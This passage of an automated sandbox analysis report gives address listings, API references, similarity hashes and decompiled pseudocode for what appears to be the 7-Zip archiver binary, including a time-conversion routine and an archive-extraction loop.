                                                                                  0x004287e2
                                                                                  0x004287e4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004287e6
                                                                                  0x004287e7
                                                                                  0x004287ea
                                                                                  0x004287ec
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004287ec
                                                                                  0x004287e2
                                                                                  0x004287f1
                                                                                  0x004287f1
                                                                                  0x004287f4
                                                                                  0x004287fd
                                                                                  0x004287fd
                                                                                  0x00428802
                                                                                  0x00428803
                                                                                  0x00428803
                                                                                  0x004287d6
                                                                                  0x00428808
                                                                                  0x0042880f
                                                                                  0x0042881a
                                                                                  0x00428821
                                                                                  0x00428821
                                                                                  0x0042882c
                                                                                  0x0042882e
                                                                                  0x0042883a
                                                                                  0x0042883f
                                                                                  0x00428842
                                                                                  0x00428844
                                                                                  0x00428846
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042884b
                                                                                  0x0042884b
                                                                                  0x0042884e
                                                                                  0x0042884e
                                                                                  0x00428850
                                                                                  0x00428853
                                                                                  0x00428853
                                                                                  0x00428853
                                                                                  0x00428856
                                                                                  0x00428856
                                                                                  0x00428859
                                                                                  0x0042885b
                                                                                  0x0042885d
                                                                                  0x00428871
                                                                                  0x00428871
                                                                                  0x00428871
                                                                                  0x0042885f
                                                                                  0x00428862
                                                                                  0x00428862
                                                                                  0x00428865
                                                                                  0x00428865
                                                                                  0x00428867
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00428869
                                                                                  0x0042886a
                                                                                  0x0042886d
                                                                                  0x0042886f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042886f
                                                                                  0x00428880
                                                                                  0x00428880
                                                                                  0x00428874
                                                                                  0x00428874
                                                                                  0x00428876
                                                                                  0x0042887b
                                                                                  0x00000000
                                                                                  0x0042887b
                                                                                  0x00428884
                                                                                  0x0042888a
                                                                                  0x0042888c
                                                                                  0x0042888e
                                                                                  0x00428890
                                                                                  0x00428896
                                                                                  0x00428896
                                                                                  0x00428898
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042889a
                                                                                  0x0042889b
                                                                                  0x0042889e
                                                                                  0x004288a0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004288a2
                                                                                  0x00000000
                                                                                  0x004288a0
                                                                                  0x004288aa
                                                                                  0x004288b5
                                                                                  0x004288bc
                                                                                  0x004288c4
                                                                                  0x004288c4
                                                                                  0x004288c6
                                                                                  0x004288c6
                                                                                  0x004288ca
                                                                                  0x004288d0
                                                                                  0x004288d6
                                                                                  0x004288d8
                                                                                  0x004288da
                                                                                  0x004288dd
                                                                                  0x004288df
                                                                                  0x004288f1
                                                                                  0x004288f6
                                                                                  0x004288f7
                                                                                  0x004288f7
                                                                                  0x004288df
                                                                                  0x00428901
                                                                                  0x00428906
                                                                                  0x00428908
                                                                                  0x0042890a
                                                                                  0x00428918
                                                                                  0x0042891b
                                                                                  0x00428920
                                                                                  0x00428925
                                                                                  0x0042892a
                                                                                  0x0042892e
                                                                                  0x00428932
                                                                                  0x00428935
                                                                                  0x0042893b
                                                                                  0x00428942
                                                                                  0x00428943
                                                                                  0x0042894a
                                                                                  0x00428954
                                                                                  0x00428957
                                                                                  0x00428968
                                                                                  0x0042896d
                                                                                  0x00428973
                                                                                  0x0042897a
                                                                                  0x0042897f
                                                                                  0x00428986
                                                                                  0x0042898b
                                                                                  0x0042898c
                                                                                  0x0042898c
                                                                                  0x0042891b
                                                                                  0x0042890a
                                                                                  0x00000000
                                                                                  0x004288ca
                                                                                  0x004285d9
                                                                                  0x004285dd
                                                                                  0x004285e8
                                                                                  0x004285ef
                                                                                  0x004285ef
                                                                                  0x004285f7
                                                                                  0x00428602
                                                                                  0x00428609
                                                                                  0x00428609
                                                                                  0x00428611
                                                                                  0x0042861b
                                                                                  0x0042861f
                                                                                  0x00428620
                                                                                  0x00428623
                                                                                  0x00428626
                                                                                  0x00428629
                                                                                  0x00428630
                                                                                  0x00428633
                                                                                  0x0042863c
                                                                                  0x0042863d
                                                                                  0x0042863f
                                                                                  0x00428640
                                                                                  0x00428641
                                                                                  0x0042864d
                                                                                  0x00428659
                                                                                  0x00428661
                                                                                  0x00428668
                                                                                  0x0042866e
                                                                                  0x00428671
                                                                                  0x00428676
                                                                                  0x0042867d
                                                                                  0x0042867d
                                                                                  0x00428991
                                                                                  0x00428994
                                                                                  0x00428997
                                                                                  0x00428999
                                                                                  0x0042899f
                                                                                  0x004289ac
                                                                                  0x004289b1
                                                                                  0x004289b1
                                                                                  0x0042899f
                                                                                  0x004289b4
                                                                                  0x004289bf
                                                                                  0x004289c1
                                                                                  0x004289c4
                                                                                  0x004289c6
                                                                                  0x004289cd
                                                                                  0x004289da
                                                                                  0x004289da
                                                                                  0x004289cf
                                                                                  0x004289d2
                                                                                  0x004289d3
                                                                                  0x004289d3
                                                                                  0x004289dc
                                                                                  0x004289e9
                                                                                  0x004289ef
                                                                                  0x004289f4
                                                                                  0x004289f4
                                                                                  0x00428a03
                                                                                  0x00428a0b

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004285B2
                                                                                    • Part of subcall function 0046B8F4: RaiseException.KERNEL32(0047CF70,?,00405CA1,?,?,?,0047CF70,?,?,?,00405CA1), ref: 0046B922
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionH_prologRaise
                                                                                  • String ID: -B
                                                                                  • API String ID: 3968804221-1556737743
                                                                                  • Opcode ID: 8b6edb9bbaf86e6928269366864835dc3159b99dbc82969dba9d0f39c986a797
                                                                                  • Instruction ID: 497342fa4ed3f4b9ebe93b95b60b4c65b54af6a842b733f80198680210375e09
                                                                                  • Opcode Fuzzy Hash: 8b6edb9bbaf86e6928269366864835dc3159b99dbc82969dba9d0f39c986a797
                                                                                  • Instruction Fuzzy Hash: FCE1F271A007158FDB24DFAAD981BAFB3F5FF84304FA0451EE056A7281DB38A941CB18
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040C756 Relevance: 3.0, APIs: 2, Instructions: 15timeCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E0040C756(struct _FILETIME* __ecx) {
				struct _SYSTEMTIME _v20;
				struct _FILETIME* _t7;

				_t7 = __ecx;
				GetSystemTime( &_v20);
				return SystemTimeToFileTime( &_v20, _t7);
			}





                                                                                  0x0040c760
                                                                                  0x0040c763
                                                                                  0x0040c776

                                                                                  APIs
                                                                                  • GetSystemTime.KERNEL32(?,?,?,00000000,00000000,00490AB0), ref: 0040C763
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040C76E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$System$File
                                                                                  • String ID:
                                                                                  • API String ID: 2838179519-0
                                                                                  • Opcode ID: f99081a57e20e77144345343434b143621f6c0873b93853711f5c94f6b142cd8
                                                                                  • Instruction ID: 3ee87ebca316f74d42706c1ab11f39572f018b02ddf3dd2ab21967cb3d1fbd11
                                                                                  • Opcode Fuzzy Hash: f99081a57e20e77144345343434b143621f6c0873b93853711f5c94f6b142cd8
                                                                                  • Instruction Fuzzy Hash: 95D0C972810129AB9B00ABA89C0D8EF7BACEA49114B840866A555D3041E6B0E51487E5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00434D28 Relevance: 2.5, APIs: 1, Instructions: 999COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 76%
                                                                                  			E00434D28() {
				signed int _t538;
				signed int _t539;
				signed int _t544;
				signed int _t545;
				signed int _t546;
				signed int _t548;
				signed int _t560;
				signed char _t562;
				signed int _t563;
				signed int _t565;
				signed int _t569;
				signed int _t570;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				signed int _t580;
				signed int _t581;
				signed int _t582;
				signed int _t589;
				signed int _t598;
				signed int _t602;
				signed int _t627;
				signed int _t631;
				signed int _t636;
				signed int _t640;
				signed int _t641;
				signed int _t643;
				signed int _t645;
				signed int _t646;
				signed int _t647;
				signed int _t655;
				signed int _t657;
				signed int _t661;
				signed int _t663;
				signed int _t664;
				signed int _t665;
				signed int _t666;
				signed int _t667;
				signed int _t674;
				signed int _t676;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				signed int _t680;
				signed int _t681;
				signed char _t691;
				signed char _t692;
				intOrPtr* _t694;
				signed int _t696;
				signed int _t698;
				signed int _t701;
				signed int _t703;
				signed int _t706;
				signed int _t712;
				signed int _t717;
				void* _t723;
				signed int _t727;
				signed int _t734;
				signed int _t742;
				signed int _t746;
				signed int _t747;
				signed int _t748;
				signed int _t749;
				signed int _t750;
				signed int _t751;
				signed int _t768;
				intOrPtr* _t775;
				intOrPtr _t776;
				signed int _t777;
				void* _t779;
				signed int _t781;
				signed int _t783;
				signed int _t787;
				signed int* _t801;
				signed int _t807;
				intOrPtr _t833;
				signed int _t836;
				signed int _t840;
				signed int _t872;
				signed int _t876;
				signed int _t880;
				signed char _t890;
				intOrPtr _t909;
				signed int _t925;
				signed int _t926;
				signed int _t935;
				intOrPtr _t938;
				signed int _t939;
				intOrPtr* _t940;
				intOrPtr* _t941;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t949;
				intOrPtr _t950;
				intOrPtr* _t952;
				intOrPtr _t954;
				intOrPtr _t956;
				intOrPtr _t958;
				void* _t959;
				void* _t961;

				L0046B890(0x477da9, _t959);
				_t935 = 0;
				 *((intOrPtr*)(_t959 - 0x10)) = _t961 - 0x98;
				 *(_t959 - 4) = 0;
				 *((char*)(_t959 - 0x21)) =  *((intOrPtr*)(_t959 + 0x10)) == 0xffffffff;
				if( *((char*)(_t959 - 0x21)) != 0) {
					 *((intOrPtr*)(_t959 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t959 + 8)) + 0x24));
				}
				if( *((intOrPtr*)(_t959 + 0x10)) == _t935) {
					L205:
					_t538 = 0;
					goto L41;
				} else {
					 *(_t959 - 0x3c) = _t935;
					 *(_t959 - 0x38) = _t935;
					 *(_t959 + 0x14) = 0xfffffffe;
					 *(_t959 - 0x90) =  *(_t959 + 0x14) != _t935;
					_t539 = 0;
					while(1) {
						 *(_t959 - 0x44) = _t539;
						if(_t539 >=  *((intOrPtr*)(_t959 + 0x10))) {
							break;
						}
						if( *((char*)(_t959 - 0x21)) == 0) {
							_t539 =  *( *((intOrPtr*)(_t959 + 0xc)) + _t539 * 4);
						}
						_t909 =  *((intOrPtr*)(_t959 + 8));
						_t765 =  *((intOrPtr*)(_t909 + 0x28)) + _t539 * 8;
						_t958 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t909 + 0x14)) +  *( *((intOrPtr*)(_t909 + 0x28)) + _t539 * 8) * 4)) + 0x70)) + ( *((intOrPtr*)(_t909 + 0x28)) + _t539 * 8)[1] * 4));
						if(( *(_t958 + 0x1c) >> 0x00000004 & 0x00000001) == 0) {
							_t768 = E00434147( *((intOrPtr*)(_t959 + 8)) + 8, _t765);
							if(_t768 !=  *(_t959 + 0x14)) {
								 *(_t959 - 0x3c) =  *(_t959 - 0x3c) + _t935;
								asm("adc [ebp-0x38], ebx");
							}
							 *(_t959 + 0x14) = _t768;
							_t935 =  *((intOrPtr*)(_t958 + 0x10)) +  *((intOrPtr*)(_t958 + 0xc));
							asm("adc ebx, ecx");
						}
						_t539 =  *(_t959 - 0x44) + 1;
					}
					 *(_t959 - 0x3c) =  *(_t959 - 0x3c) + _t935;
					asm("adc [ebp-0x38], ebx");
					_t775 =  *((intOrPtr*)(_t959 + 0x18));
					 *((intOrPtr*)( *_t775 + 0xc))(_t775,  *(_t959 - 0x3c),  *(_t959 - 0x38));
					_push(0x38);
					 *(_t959 - 0x3c) = 0;
					 *(_t959 - 0x38) = 0;
					 *((intOrPtr*)(_t959 - 0x8c)) = 0;
					 *((intOrPtr*)(_t959 - 0x88)) = 0;
					_t787 = L004079F2();
					 *(_t959 + 0x14) = _t787;
					__eflags = _t787;
					 *(_t959 - 4) = 1;
					if(_t787 == 0) {
						_t945 = 0;
						__eflags = 0;
					} else {
						_t945 = L0040F3E5(_t787);
					}
					 *(_t959 - 4) =  *(_t959 - 4) & 0x00000000;
					__eflags = _t945;
					 *(_t959 - 0x98) = _t945;
					 *(_t959 - 0x2c) = _t945;
					if(_t945 != 0) {
						 *((intOrPtr*)( *_t945 + 4))(_t945);
					}
					_push(0);
					 *(_t959 - 4) = 2;
					L0040F478(_t945, _t775);
					_push(0x18);
					_t544 = L004079F2();
					__eflags = _t544;
					if(_t544 == 0) {
						_t544 = 0;
						__eflags = 0;
					} else {
						 *((intOrPtr*)(_t544 + 4)) = 0x47b080;
						 *((intOrPtr*)(_t544 + 8)) = 0;
						 *((intOrPtr*)(_t544 + 0x10)) = 0;
						 *((intOrPtr*)(_t544 + 0xc)) = 0;
						 *((intOrPtr*)(_t544 + 0x14)) = 0;
						 *_t544 = 0x47b070;
						 *((intOrPtr*)(_t544 + 4)) = 0x47b060;
					}
					__eflags = _t544;
					 *(_t959 - 0x28) = _t544;
					if(_t544 != 0) {
						 *((intOrPtr*)( *_t544 + 4))(_t544);
					}
					 *(_t959 - 0x94) = 0;
					 *(_t959 - 0x20) = 0;
					 *(_t959 - 0x58) = 0;
					 *(_t959 - 0x1c) = 0;
					 *(_t959 - 0x5c) = 0;
					 *(_t959 - 0x18) = 0;
					_push(0x24);
					 *(_t959 - 4) = 6;
					_t545 = L004079F2();
					 *(_t959 + 0x14) = _t545;
					__eflags = _t545;
					 *(_t959 - 4) = 7;
					if(_t545 == 0) {
						_t946 = 0;
						__eflags = 0;
					} else {
						_t946 = E00435A6A(_t545);
					}
					__eflags = _t946;
					 *(_t959 - 0x50) = _t946;
					 *(_t959 - 4) = 6;
					 *(_t959 - 0x14) = _t946;
					if(_t946 != 0) {
						 *((intOrPtr*)( *_t946 + 4))(_t946);
					}
					 *(_t959 - 4) = 8;
					_t546 = L004339CC(_t946);
					__eflags = _t546;
					if(_t546 != 0) {
						E00404AD0(_t959 - 0x84, 1);
						 *((intOrPtr*)(_t959 - 0x84)) = 0x47ab08;
						 *(_t959 - 4) = 9;
						 *(_t959 - 0x44) = 0;
						while(1) {
							L43:
							_t548 =  *(_t959 - 0x44);
							__eflags = _t548 -  *((intOrPtr*)(_t959 + 0x10));
							if(_t548 >=  *((intOrPtr*)(_t959 + 0x10))) {
								break;
							}
							__eflags =  *((char*)(_t959 - 0x21));
							if( *((char*)(_t959 - 0x21)) == 0) {
								_t947 =  *( *((intOrPtr*)(_t959 + 0xc)) +  *(_t959 - 0x44) * 4);
							} else {
								_t947 = _t548;
							}
							_t938 =  *((intOrPtr*)(_t959 + 8));
							 *(_t959 - 0x44) =  *(_t959 - 0x44) + 1;
							_t801 =  *((intOrPtr*)(_t938 + 0x28)) + _t947 * 8;
							 *(_t959 - 0xa0) = _t801;
							_t776 =  *((intOrPtr*)( *((intOrPtr*)(_t938 + 0x14)) +  *_t801 * 4));
							_t560 =  *( *((intOrPtr*)(_t776 + 0x70)) + _t801[1] * 4);
							 *(_t959 - 0x48) = _t560;
							_t562 =  *(_t560 + 0x1c) >> 4;
							__eflags = _t562 & 0x00000001;
							if((_t562 & 0x00000001) == 0) {
								_t563 = E00434147(_t938 + 8, _t801);
								__eflags = _t563;
								 *(_t959 - 0x54) = _t563;
								if(_t563 >= 0) {
									_t565 =  *( *((intOrPtr*)(_t938 + 0x50)) +  *(_t959 - 0x54) * 4);
									 *(_t959 - 0x60) = _t565;
									 *(_t959 + 0x14) = _t565;
									E0040862D();
									while(1) {
										__eflags =  *(_t959 + 0x14) - _t947;
										if( *(_t959 + 0x14) >= _t947) {
											break;
										}
										L0043AC2F(_t959 - 0x84, 0);
										 *(_t959 + 0x14) =  *(_t959 + 0x14) + 1;
									}
									L0043AC2F(_t959 - 0x84, 1);
									 *(_t959 + 0x14) =  *(_t959 + 0x14) + 1;
									_t569 =  *((intOrPtr*)( *(_t959 - 0x48) + 0x10)) +  *((intOrPtr*)( *(_t959 - 0x48) + 0xc));
									__eflags = _t569;
									asm("adc ecx, esi");
									 *(_t959 - 0x68) = _t569;
									 *((intOrPtr*)(_t959 - 0x64)) = 0;
									while(1) {
										_t570 =  *(_t959 - 0x44);
										__eflags = _t570 -  *((intOrPtr*)(_t959 + 0x10));
										if(_t570 >=  *((intOrPtr*)(_t959 + 0x10))) {
											break;
										}
										__eflags =  *((char*)(_t959 - 0x21));
										if( *((char*)(_t959 - 0x21)) == 0) {
											_t570 =  *( *((intOrPtr*)(_t959 + 0xc)) + _t570 * 4);
										}
										 *(_t959 - 0x4c) = _t570;
										_t722 =  *((intOrPtr*)(_t938 + 0x28)) +  *(_t959 - 0x4c) * 8;
										_t956 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t938 + 0x14)) +  *( *((intOrPtr*)(_t938 + 0x28)) +  *(_t959 - 0x4c) * 8) * 4)) + 0x70)) + ( *((intOrPtr*)(_t938 + 0x28)) +  *(_t959 - 0x4c) * 8)[1] * 4));
										_t890 =  *(_t956 + 0x1c) >> 4;
										__eflags = _t890 & 0x00000001;
										if((_t890 & 0x00000001) != 0) {
											L90:
											 *(_t959 - 0x44) =  *(_t959 - 0x44) + 1;
											continue;
										} else {
											_t723 = E00434147(_t938 + 8, _t722);
											__eflags = _t723 -  *(_t959 - 0x54);
											if(_t723 !=  *(_t959 - 0x54)) {
												break;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags =  *(_t959 + 0x14) -  *(_t959 - 0x4c);
												if( *(_t959 + 0x14) >=  *(_t959 - 0x4c)) {
													break;
												}
												L0043AC2F(_t959 - 0x84, 0);
												 *(_t959 + 0x14) =  *(_t959 + 0x14) + 1;
											}
											L0043AC2F(_t959 - 0x84, 1);
											 *(_t959 + 0x14) =  *(_t959 + 0x14) + 1;
											_t727 =  *((intOrPtr*)(_t956 + 0x10)) +  *((intOrPtr*)(_t956 + 0xc));
											__eflags = _t727;
											asm("adc ecx, esi");
											 *(_t959 - 0x68) = _t727;
											 *((intOrPtr*)(_t959 - 0x64)) = 0;
											goto L90;
										}
									}
									_t807 =  *(_t959 - 0x98);
									 *(_t807 + 0x28) =  *(_t959 - 0x3c);
									 *(_t807 + 0x2c) =  *(_t959 - 0x38);
									 *((intOrPtr*)(_t807 + 0x20)) =  *((intOrPtr*)(_t959 - 0x8c));
									 *((intOrPtr*)(_t807 + 0x24)) =  *((intOrPtr*)(_t959 - 0x88));
									_t949 = L0040F554(_t807);
									__eflags = _t949;
									if(_t949 != 0) {
										goto L52;
									}
									_push(0x50);
									_t589 = L004079F2();
									__eflags = _t589;
									if(_t589 == 0) {
										_t939 = 0;
										__eflags = 0;
									} else {
										_t939 = _t589;
										 *((intOrPtr*)(_t589 + 4)) = 0;
										 *((intOrPtr*)(_t589 + 0x10)) = 0;
										 *((intOrPtr*)(_t589 + 0x2c)) = 0;
										 *((intOrPtr*)(_t589 + 0x34)) = 0;
										 *_t589 = 0x47b460;
									}
									__eflags = _t939;
									 *(_t959 - 0x34) = _t939;
									if(_t939 != 0) {
										 *((intOrPtr*)( *_t939 + 4))(_t939);
									}
									 *(_t959 - 4) = 0xc;
									_t950 =  *((intOrPtr*)( *((intOrPtr*)(_t776 + 0x5c)) + E00434120( *(_t959 - 0x48),  *((intOrPtr*)(_t776 + 0x58))) * 4));
									E00434705(_t939,  *((intOrPtr*)(_t959 + 8)) + 8, _t959 - 0x84,  *(_t959 - 0x60),  *(_t959 - 0x68),  *((intOrPtr*)(_t959 - 0x64)),  *((intOrPtr*)(_t959 + 0x18)),  *(_t959 - 0x90));
									 *( *(_t959 - 0x50) + 0x21) =  *( *(_t959 - 0x50) + 0x21) & 0x00000000;
									_t598 =  *(_t950 + 6) & 0x0000000f;
									__eflags = _t598;
									if(_t598 == 0) {
										L124:
										 *((intOrPtr*)( *(_t959 - 0x50) + 0x18)) = 0;
										 *(_t959 - 0x40) = 0;
										 *(_t959 - 0x4c) =  *( *(_t959 - 0xa0));
										_t602 = E00434120( *(_t959 - 0x48),  *((intOrPtr*)(_t776 + 0x58)));
										 *(_t959 + 0x17) =  *(_t959 + 0x17) & 0x00000000;
										_t324 = _t959 - 0x2d;
										 *_t324 =  *(_t959 - 0x2d) & 0x00000000;
										__eflags =  *_t324;
										 *(_t959 - 0x60) = _t602;
										 *(_t959 - 0x48) = 0;
										while(1) {
											asm("sbb ecx, [edi+0x4c]");
											__eflags =  *((intOrPtr*)(_t939 + 0x40)) -  *((intOrPtr*)(_t939 + 0x48)) |  *(_t939 + 0x44);
											if(( *((intOrPtr*)(_t939 + 0x40)) -  *((intOrPtr*)(_t939 + 0x48)) |  *(_t939 + 0x44)) == 0) {
												break;
											}
											_t833 =  *((intOrPtr*)(_t959 + 8));
											__eflags =  *(_t959 - 0x4c) -  *((intOrPtr*)(_t833 + 0x10));
											if( *(_t959 - 0x4c) >=  *((intOrPtr*)(_t833 + 0x10))) {
												L200:
												_t949 = E00434C64(_t939);
												__eflags = _t949;
												if(_t949 == 0) {
													L203:
													 *(_t959 - 0x3c) =  *(_t959 - 0x3c) +  *(_t959 - 0x68);
													 *(_t959 - 4) = 9;
													asm("adc [ebp-0x38], eax");
													L0043361B(_t959 - 0x34);
													goto L43;
												}
												L201:
												 *(_t959 - 4) = 9;
												L0043361B(_t959 - 0x34);
												 *(_t959 - 4) = 8;
												E00408604(_t959 - 0x84);
												 *(_t959 - 4) = 6;
												L0043361B(_t959 - 0x14);
												 *(_t959 - 4) = 5;
												L0043361B(_t959 - 0x18);
												 *(_t959 - 4) = 4;
												L0043361B(_t959 - 0x1c);
												 *(_t959 - 4) = 3;
												L0043361B(_t959 - 0x20);
												 *(_t959 - 4) = 2;
												L0043361B(_t959 - 0x28);
												_t512 = _t959 - 4;
												 *_t512 =  *(_t959 - 4) & 0x00000000;
												__eflags =  *_t512;
												L0043361B(_t959 - 0x2c);
												goto L202;
											}
											__eflags =  *(_t959 - 0x48);
											_t952 =  *((intOrPtr*)( *((intOrPtr*)(_t833 + 0x14)) +  *(_t959 - 0x4c) * 4));
											 *(_t959 - 0x54) =  *( *((intOrPtr*)(_t952 + 0x5c)) +  *(_t959 - 0x60) * 4);
											if( *(_t959 - 0x48) != 0) {
												L133:
												_t627 =  *(_t959 - 0x54);
												_t836 =  *(_t959 - 0x50);
												__eflags =  *(_t959 - 0x48) - ( *(_t627 + 4) & 0x0000ffff);
												if( *(_t959 - 0x48) != ( *(_t627 + 4) & 0x0000ffff)) {
													 *(_t959 - 0x48) =  *(_t959 - 0x48) + 1;
													 *(_t836 + 0x20) =  *(_t836 + 0x20) & 0x00000000;
													__eflags =  *(_t959 - 0x2d);
													if(__eflags == 0) {
														_t372 = _t836 + 0x14;
														 *_t372 =  *(_t836 + 0x14) & 0x00000000;
														__eflags =  *_t372;
													}
													_t631 = L00433AD8(_t836, __eflags, _t959 - 0xa4, _t959 - 0x9c);
													__eflags = _t631 - 1;
													 *(_t959 - 0x40) = _t631;
													if(_t631 == 1) {
														break;
													} else {
														__eflags = _t631;
														if(_t631 == 0) {
															__eflags =  *(_t959 - 0x9c);
															 *(_t959 - 0x2d) =  *(_t959 - 0x9c) == 0;
															__eflags =  *(_t959 - 0x2d);
															if( *(_t959 - 0x2d) != 0) {
																continue;
															}
															_t925 =  *(_t959 - 0x98);
															asm("adc ecx, [ebp-0x38]");
															_t954 =  *((intOrPtr*)(_t959 - 0x8c)) +  *((intOrPtr*)(_t959 - 0xa4));
															_t779 = 0;
															 *((intOrPtr*)(_t925 + 0x28)) =  *((intOrPtr*)(_t939 + 0x48)) +  *(_t959 - 0x3c);
															asm("adc [ebp-0x88], ebx");
															 *((intOrPtr*)(_t925 + 0x2c)) =  *((intOrPtr*)(_t939 + 0x4c));
															 *((intOrPtr*)(_t925 + 0x20)) = _t954;
															 *((intOrPtr*)(_t959 - 0x8c)) = _t954;
															 *((intOrPtr*)(_t925 + 0x24)) =  *((intOrPtr*)(_t959 - 0x88));
															_t949 = L0040F554(_t925);
															__eflags = _t949 - _t779;
															if(_t949 == _t779) {
																_t636 =  *(_t939 + 0x44);
																_t840 =  *((intOrPtr*)(_t939 + 0x40)) -  *((intOrPtr*)(_t939 + 0x48));
																__eflags = _t840;
																asm("sbb eax, [edi+0x4c]");
																 *(_t959 - 0x70) = _t840;
																 *(_t959 - 0x6c) = _t636;
																if(_t840 != 0) {
																	L170:
																	_t840 = 0x8000;
																	_t636 = 0;
																	__eflags = 0;
																	 *(_t959 - 0x70) = 0x8000;
																	 *(_t959 - 0x6c) = 0;
																	L171:
																	_t926 =  *(_t959 - 0x9c);
																	__eflags = _t636;
																	if(__eflags < 0) {
																		L175:
																		_t640 = ( *( *(_t959 - 0x54) + 6) & 0x0000000f) - _t779;
																		__eflags = _t640;
																		if(_t640 == 0) {
																			_t641 =  *(_t959 - 0x28);
																			L183:
																			 *(_t959 - 0x40) =  *((intOrPtr*)( *_t641 + 0xc))(_t641,  *(_t959 - 0x14),  *(_t959 - 0x34), _t779, _t959 - 0x70, _t779);
																			L184:
																			__eflags =  *(_t959 - 0x40) - _t779;
																			if( *(_t959 - 0x40) == _t779) {
																				 *(_t959 + 0x17) = 1;
																				continue;
																			}
																			__eflags =  *(_t959 - 0x40) - 1;
																			if( *(_t959 - 0x40) == 1) {
																				goto L200;
																			}
																			_t643 =  *(_t959 - 0x34);
																			 *(_t959 - 4) = 9;
																			__eflags = _t643;
																			if(_t643 != 0) {
																				 *((intOrPtr*)( *_t643 + 8))(_t643);
																			}
																			 *(_t959 - 4) = 8;
																			E00408604(_t959 - 0x84);
																			_t645 =  *(_t959 - 0x14);
																			 *(_t959 - 4) = 6;
																			__eflags = _t645;
																			if(_t645 != 0) {
																				 *((intOrPtr*)( *_t645 + 8))(_t645);
																			}
																			_t646 =  *(_t959 - 0x18);
																			 *(_t959 - 4) = 5;
																			__eflags = _t646;
																			if(_t646 != 0) {
																				 *((intOrPtr*)( *_t646 + 8))(_t646);
																			}
																			_t647 =  *(_t959 - 0x1c);
																			 *(_t959 - 4) = 4;
																			__eflags = _t647;
																			if(_t647 != 0) {
																				 *((intOrPtr*)( *_t647 + 8))(_t647);
																			}
																			 *(_t959 - 4) = 3;
																			L0043361B(_t959 - 0x20);
																			 *(_t959 - 4) = 2;
																			L0043361B(_t959 - 0x28);
																			_t489 = _t959 - 4;
																			 *_t489 =  *(_t959 - 4) & 0x00000000;
																			__eflags =  *_t489;
																			L0043361B(_t959 - 0x2c);
																			L195:
																			_t538 =  *(_t959 - 0x40);
																			goto L41;
																		}
																		_t655 = _t640 - 1;
																		__eflags = _t655;
																		if(_t655 == 0) {
																			 *((char*)( *(_t959 - 0x94) + 0xd52)) =  *(_t959 + 0x17);
																			_t641 =  *(_t959 - 0x20);
																			goto L183;
																		}
																		_t657 = _t655 - 1;
																		__eflags = _t657;
																		if(_t657 == 0) {
																			 *((char*)( *(_t959 - 0x5c) + 0x84)) =  *(_t959 + 0x17);
																			_t641 =  *(_t959 - 0x18);
																			goto L183;
																		}
																		__eflags = _t657 != 1;
																		if(_t657 != 1) {
																			goto L184;
																		}
